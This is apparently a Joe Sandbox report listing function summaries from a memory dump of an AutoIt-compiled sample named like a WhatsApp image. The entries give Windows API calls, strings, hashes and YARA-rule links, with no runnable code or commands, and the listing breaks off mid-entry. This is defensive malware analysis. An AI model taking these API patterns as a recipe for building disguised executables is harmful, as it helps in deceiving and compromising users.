Opcode Fuzzy Hash: 14b7730bf44ee98fa27ae6c02deeae4e8626ed864cad7414451795b7880f11e4
Instruction Fuzzy Hash: 695136B1409744ABE720AF54EC86BAFBBE8FF94354F41484EF5C8410A2DB7185A8D752

Function 000CC56D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 000844ED: __fread_nolock.LIBCMT ref: 0008450B

_wcscmp.LIBCMT ref: 000CC65D
_wcscmp.LIBCMT ref: 000CC670

Strings

FILE, xrefs: 000CC5A5

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: 02e52041324f7fa076abc2e7843cb4264562fd28ea10e3ed4d44bc4490cab249
Instruction ID: 03e856acee9540df9195e423cb5b5068e4da8ca0576cfecb8708714ac8758cc1
Opcode Fuzzy Hash: 02e52041324f7fa076abc2e7843cb4264562fd28ea10e3ed4d44bc4490cab249
Instruction Fuzzy Hash: B341B472A0021ABBDF21ABA4DC42FEF77B9EF49714F000469F645EB182D7759A04CB61

Function 000EA76A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 000EA85A
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 000EA86F

Strings

', xrefs: 000EA7C3

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: de85cc2d98cee94bd16988cf0d2a52e06b05de577131fc841c4bb61156b007dd
Instruction ID: 1591cca22bf503551cb386492c24b0a1dff193629cbeb2c8ce4f560eb0e97a7c
Opcode Fuzzy Hash: de85cc2d98cee94bd16988cf0d2a52e06b05de577131fc841c4bb61156b007dd
Instruction Fuzzy Hash: CA410774E012499FDB54CF69C980BDA7BB9FB09300F11016AE905AB351D771A941CFA1

Function 000E975A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 000E980E
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 000E984A

Strings

static, xrefs: 000E97AA

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 87c4340d5530c133c21a0401506b1c0f3bab916304ea38ed0459a525db2266c6
Instruction ID: 115628e3597e2a3ca40a4a402bc9cad6b8f66db6110fb51c77d7b347e6c7ce89
Opcode Fuzzy Hash: 87c4340d5530c133c21a0401506b1c0f3bab916304ea38ed0459a525db2266c6
Instruction Fuzzy Hash: 9D318D71110644AEEB109F75CC80BFB73A9FF99760F008619F9A9D71A1DB71AC81D760

Function 000C5157 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 000C51C6
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 000C5201

Strings

0, xrefs: 000C51BF

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: c6b471d5354e3d7c1e34bfaebb54f683ecfb02a83d1e89a9cc33e8de8e1b46c2
Instruction ID: 27ab53acb66826d21b45f1b90564b3c5cf33ad9193d7a8e834054ee8b8ab855f
Opcode Fuzzy Hash: c6b471d5354e3d7c1e34bfaebb54f683ecfb02a83d1e89a9cc33e8de8e1b46c2
Instruction Fuzzy Hash: FA31D239600705ABEB64CF99DC45FAEBBF8BF46352F14401DE981A61A1E770AAC4DB10

Function 000D658B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 000D6608

Strings

AUTOITCALLVARIABLE%d, xrefs: 000D65FA
, $, xrefs: 000D6648

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: __snwprintf
String ID: , $$AUTOITCALLVARIABLE%d
API String ID: 2391506597-2584243854
Opcode ID: d9a51ec96011773e87396ac14bb432c39a98dce801860f9e9611ee872149967d
Instruction ID: 67ac59f7698757a574e0925ffbfd7e4dacce49132335e2b163de613d87bf8ce4
Opcode Fuzzy Hash: d9a51ec96011773e87396ac14bb432c39a98dce801860f9e9611ee872149967d
Instruction Fuzzy Hash: 0F218D71600218AFCF14EFA4CC82EEE77B4BF45740F40046AF545AB282DB71EA45CBA5

Function 000E93CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 000E945C
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 000E9467

Strings

Combobox, xrefs: 000E9429

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 2afc33d7ee87009d86ee706a8c871d20790cc283a9aeb269b0612f2f1462bd70
Instruction ID: 26dcf60cfa99e854dfd416e3854154f8b5e6d73f1f4c6991445b5511677a50ed
Opcode Fuzzy Hash: 2afc33d7ee87009d86ee706a8c871d20790cc283a9aeb269b0612f2f1462bd70
Instruction Fuzzy Hash: FF11B2B13002487FEF219E65DC80EFB37AEEB483A4F100125F919A72E0D7719C928760

Function 000EDA42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 0009B34E: GetWindowLongW.USER32(?,000000EB), ref: 0009B35F

GetActiveWindow.USER32 ref: 000EDA7B
EnumChildWindows.USER32(?,000ED75F,00000000), ref: 000EDAF5

Strings

T1, xrefs: 000EDAFB

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Window$ActiveChildEnumLongWindows
String ID: T1
API String ID: 3814560230-739779697
Opcode ID: de62aa50931986ba9a809ebddd1571bfbc80cd0fcbd73b2f9b7b4e40957bb0ce
Instruction ID: 9f1bb85bd2191c4a2f3b17f8f2973fe09d385adbbf23bb4143556e5f87c824dd
Opcode Fuzzy Hash: de62aa50931986ba9a809ebddd1571bfbc80cd0fcbd73b2f9b7b4e40957bb0ce
Instruction Fuzzy Hash: 9F214F79604201EFC754DF29E850AA673F5EF4A320F1A0619F969973F0E770A880DF50

Function 000E98FE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 0009D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0009D1BA
Part of subcall function 0009D17C: GetStockObject.GDI32(00000011), ref: 0009D1CE
Part of subcall function 0009D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0009D1D8

GetWindowRect.USER32(00000000,?), ref: 000E9968
GetSysColor.USER32(00000012), ref: 000E9982

Strings

static, xrefs: 000E9945

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 64daf4634fe02f21a999f2a51291d9d4c18e3cd55be28319bd12d05ea83148ba
Instruction ID: 0c1f40a14c8ac022984cb9019f2cafd60d114af1a3d434094fff9f1776cae1bf
Opcode Fuzzy Hash: 64daf4634fe02f21a999f2a51291d9d4c18e3cd55be28319bd12d05ea83148ba
Instruction Fuzzy Hash: 06116772520209AFDB04DFB8CC45AEA7BB8FB08304F01462DF995E3251E775E850DB60

Function 000E9617 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 000E9699
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 000E96A8

Strings

edit, xrefs: 000E967D

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: a79c94d72ee27f4e63a60736a2a76778ba051fecc42662b63859720f48276ee7
Instruction ID: ea677e1e2ab038949a826a31f2794ae3b0aaa808d3e9b12d0f87cda7b962f293
Opcode Fuzzy Hash: a79c94d72ee27f4e63a60736a2a76778ba051fecc42662b63859720f48276ee7
Instruction Fuzzy Hash: 6F118C71100188AFEF619FA5EC40EEB3BAAEB05378F504716F965A71E0C771DC909760

Function 000C5262 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 000C52D5
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 000C52F4

Strings

0, xrefs: 000C52CE

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 9dc4e273c073b5d7c1113bf65c661c3e4780a3ab7588854e1ec70e3c2e9543b9
Instruction ID: ef9342882e158a3c82231a7c5532e8116f6af167c77e68a7f95dbc8d89d278dd
Opcode Fuzzy Hash: 9dc4e273c073b5d7c1113bf65c661c3e4780a3ab7588854e1ec70e3c2e9543b9
Instruction Fuzzy Hash: 3411E27EA01654ABDB60DB98DD04F9D77F8AB46791F040029E942E72E0D3B0FE84CB90

Function 000D4D9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 000D4DF5
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 000D4E1E

Strings

<local>, xrefs: 000D4DE6

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: d7ac0b447ddd6b205dc2cff1fde52bdf307b1ac7453cc41e90352aefc505245b
Instruction ID: b8f3be26a908a57e169498b49c95dccfa5e0418176b10267b83bfb36b39db1ec
Opcode Fuzzy Hash: d7ac0b447ddd6b205dc2cff1fde52bdf307b1ac7453cc41e90352aefc505245b
Instruction Fuzzy Hash: D0117C70501321BBDB258FA1C889EFBFBA9FF16755F10822BF55696640D3B05984C6F0

Function 000DA82C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON

Download Yara Rule

APIs

inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 000DA84E
htons.WSOCK32(00000000,?,00000000), ref: 000DA88B

Strings

255.255.255.255, xrefs: 000DA866

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: htonsinet_addr
String ID: 255.255.255.255
API String ID: 3832099526-2422070025
Opcode ID: c64b4c4f2b1ee5f8285885dfcebc9b150df38dbc8b6411cd5b339ee08c4e7d23
Instruction ID: 7a65a9487a9f36222dde6ad6e59a45376137c7a6eb23e8be0173c86270367326
Opcode Fuzzy Hash: c64b4c4f2b1ee5f8285885dfcebc9b150df38dbc8b6411cd5b339ee08c4e7d23
Instruction Fuzzy Hash: C801D675300304ABDB21AFA4D856FEEB3A4EF45314F10842BF915A73D2DB71E8019766

Function 000BB781 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 000BB7EF

Strings

ComboBox, xrefs: 000BB78B
ListBox, xrefs: 000BB7B9

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: dd8b14d952ac0b3b3a41e667ff9660ab9842ba1dc1e26333bd5b5347a4567b22
Instruction ID: 98a60b8a421869ff4947188afca38c197f2a6441715218e565f15f4efdc4c2e3
Opcode Fuzzy Hash: dd8b14d952ac0b3b3a41e667ff9660ab9842ba1dc1e26333bd5b5347a4567b22
Instruction Fuzzy Hash: 1D01DF75640118ABDB14FBA4CC52DFE73B9BF46350B04061EF4A2A72D2EFB05908CBA0

Function 000BB67D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000180,00000000,?), ref: 000BB6EB

Strings

ComboBox, xrefs: 000BB687
ListBox, xrefs: 000BB6B5

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: 33c0bb15c980b923fe8fd9a67549a876e929592968120813b2c07051a3b813f5
Instruction ID: e5a49fa948c5d1d85e80523f94c8477e4095f948bf8398e064651b57c114d426
Opcode Fuzzy Hash: 33c0bb15c980b923fe8fd9a67549a876e929592968120813b2c07051a3b813f5
Instruction Fuzzy Hash: 73016D75641108ABDB14FBA4D953EFE73B8AF05344F14002AB542B3292EBA49E1897B5

Function 000BB700 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000182,?,00000000), ref: 000BB76C

Strings

ComboBox, xrefs: 000BB70A
ListBox, xrefs: 000BB738

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: 1e3fbdff4c81d0e0398395a282cea2f6279b208bef7637ebc9c15c833f457409
Instruction ID: 18a260a9501a65aee4cd92e03190f584c5beaca7fb611b2a0c22c7438b19e15f
Opcode Fuzzy Hash: 1e3fbdff4c81d0e0398395a282cea2f6279b208bef7637ebc9c15c833f457409
Instruction Fuzzy Hash: 6701AD75680104ABDB10FBA4D902EFE73ECAF05344F14001AB442B3292EFB05E0987B5

Function 000C7744 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 000C7762
_wcscmp.LIBCMT ref: 000C7774

Strings

#32770, xrefs: 000C776E

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: 8984f83d13e21976d554e26dd972811996b3794becfb589b8bc189f35f1731e5
Instruction ID: b856e5fc049ea7eae3c4d7ac830043b4b8b35e00cd26ff026196121a49a86ee0
Opcode Fuzzy Hash: 8984f83d13e21976d554e26dd972811996b3794becfb589b8bc189f35f1731e5
Instruction Fuzzy Hash: CEE092B7A042286BD710ABE5EC0AECBFBACAB55764F00011AB915E3081D660A74187D4

Function 000BA631 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 000BA63F

Part of subcall function 000A13F1: _doexit.LIBCMT ref: 000A13FB

Strings

AutoIt, xrefs: 000BA633
Error allocating memory., xrefs: 000BA638

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: Message_doexit
String ID: AutoIt$Error allocating memory.
API String ID: 1993061046-4017498283
Opcode ID: 2d23e5cf62b3bf1488d81d2c0376dd985b106ed1b8c89da8ede886efd1e2277d
Instruction ID: 0310d4931c524660823bc1d9b52d02060c464a59cfc94a2e61c8ee0cd8fdec87
Opcode Fuzzy Hash: 2d23e5cf62b3bf1488d81d2c0376dd985b106ed1b8c89da8ede886efd1e2277d
Instruction Fuzzy Hash: 5DD05B323C472833D61436D87C17FD576489B16B55F044065FB48955C34EE3968052D9

Function 000FAE86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 000FACC0
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 000FAEBD

Strings

WIN_XPe, xrefs: 000FACD3

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678684904.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678707327.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_IMG-20241119-WA0006(162KB).jbxd

Similarity

API ID: DirectoryFreeLibrarySystem
String ID: WIN_XPe
API String ID: 510247158-3257408948
Opcode ID: a989807eeea78c238c057a750de06ca83db83eb45240bca6baad3e5710c8bc48
Instruction ID: 719e0aa98a048e130e92023f9594292401b3df84c35bf039eb4f1bca87c7025f
Opcode Fuzzy Hash: a989807eeea78c238c057a750de06ca83db83eb45240bca6baad3e5710c8bc48
Instruction Fuzzy Hash: 6FE065B0D0014DDFCB11DBA4D9449FCF7B8AB49300F108082E15AB2960CB705A84EF21

Function 000E8698 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 000E86A2
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 000E86B5

Part of subcall function 000C7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 000C7AD0

Strings

Shell_TrayWnd, xrefs: 000E869B

Memory Dump Source

Source File: 00000000.00000002.1678541328.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.1678522928.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1678602457.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
